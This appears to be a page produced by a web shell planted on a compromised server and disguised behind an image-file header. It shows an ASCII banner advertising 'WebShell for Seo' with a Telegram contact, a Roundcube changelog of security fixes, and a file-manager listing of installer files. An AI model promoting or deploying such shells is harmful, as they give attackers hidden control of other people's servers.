����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
## Release 1.6.17 - Enigma: Support automatic public key lookup (import) using HKP v1 protocol (#5314) - Enigma: Kolab WOAT Support (#8626) - Security: Fix an infinite loop in TNEF (winmail.dat) decoder (#10193) - Security: Fix various vulnerabilities in the password plugin using session-injected username - Security: Fix stored XSS via unescaped attachment MIME type on the attachment-validation warning page [CVE-2026-54432] - Security: Fix SSRF bypass via specific local address URLs - two new cases - Security: Fix zero-click stored XSS in plain-text rendering [CVE-2026-54433] - Security: Fix DoS via crafted compressed-RTF size in the TNEF (winmail.dat) file ## Release 1.6.16 - Fix potential too long value in IMAP ID command (#10136) - Security: Fix stored XSS/HTML/CSS injection in subject field of the draft restore dialog - Security: Fix CSS injection bypass in HTML sanitizer via SVG `<animate attributeName="style">` - Security: Fix pre-auth SQL injection in `virtuser_query` plugin via preg_replace backslash escape bypass - Security: Fix SSRF bypass via specific local address URLs - Security: Fix bypass of remote image blocking via CSS var() - Security: Fix local/private URL fetch bypass when remote resources were not allowed - Security: Fix pre-auth arbitrary file delete via redis/memcache session poisoning bypass - Security: Fix code injection vulnerability - remove support for code evaluation in LDAP `autovalues` option ## Release 1.6.15 - Fix regression where mail search would fail on non-ascii search criteria (#10121) - Fix regression where some data url images could get ignored/lost (#10128) - Fix SVG Animate FUNCIRI Attribute Bypass — Remote Image Loading via fill/filter/stroke ## Release 1.6.14 - Fix Postgres connection using IPv6 address (#10104) - Security: Fix pre-auth arbitrary file write via unsafe deserialization in redis/memcache session handler - Security: Fix bug where a password could get changed without providing the old password - Security: Fix IMAP Injection + CSRF bypass in mail search - Security: Fix remote image blocking bypass via various SVG animate attributes - Security: Fix remote image blocking bypass via a crafted body background attribute - Security: Fix fixed position mitigation bypass via use of !important - Security: Fix XSS issue in a HTML attachment preview - Security: Fix SSRF + Information Disclosure via stylesheet links to a local network hosts
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| images | Folder | 0755 |
|
|
| php53 | Folder | 0755 |
|
|
| php56 | Folder | 0755 |
|
|
| php71 | Folder | 0755 |
|
|
| php81 | Folder | 0755 |
|
|
| php82 | Folder | 0755 |
|
|
| changelog.txt | File | 2.38 KB | 0644 |
|
| clone.php | File | 3.4 KB | 0644 |
|
| config.inc.php | File | 3.9 KB | 0644 |
|
| fileindex.php | File | 203 B | 0644 |
|
| import.php | File | 3.29 KB | 0644 |
|
| info.xml | File | 2.94 KB | 0644 |
|
| install.js | File | 1.25 KB | 0644 |
|
| install.php | File | 6.51 KB | 0644 |
|
| install.xml | File | 3.73 KB | 0644 |
|
| md5 | File | 2.46 KB | 0644 |
|
| notes.txt | File | 1.23 KB | 0644 |
|
| remove.php | File | 3.11 KB | 0644 |
|
| roundcube.sql | File | 14.88 KB | 0644 |
|
| roundcube.zip | File | 7.01 MB | 0644 |
|
| upgrade.php | File | 7.01 KB | 0644 |
|
| upgrade.xml | File | 341 B | 0644 |
|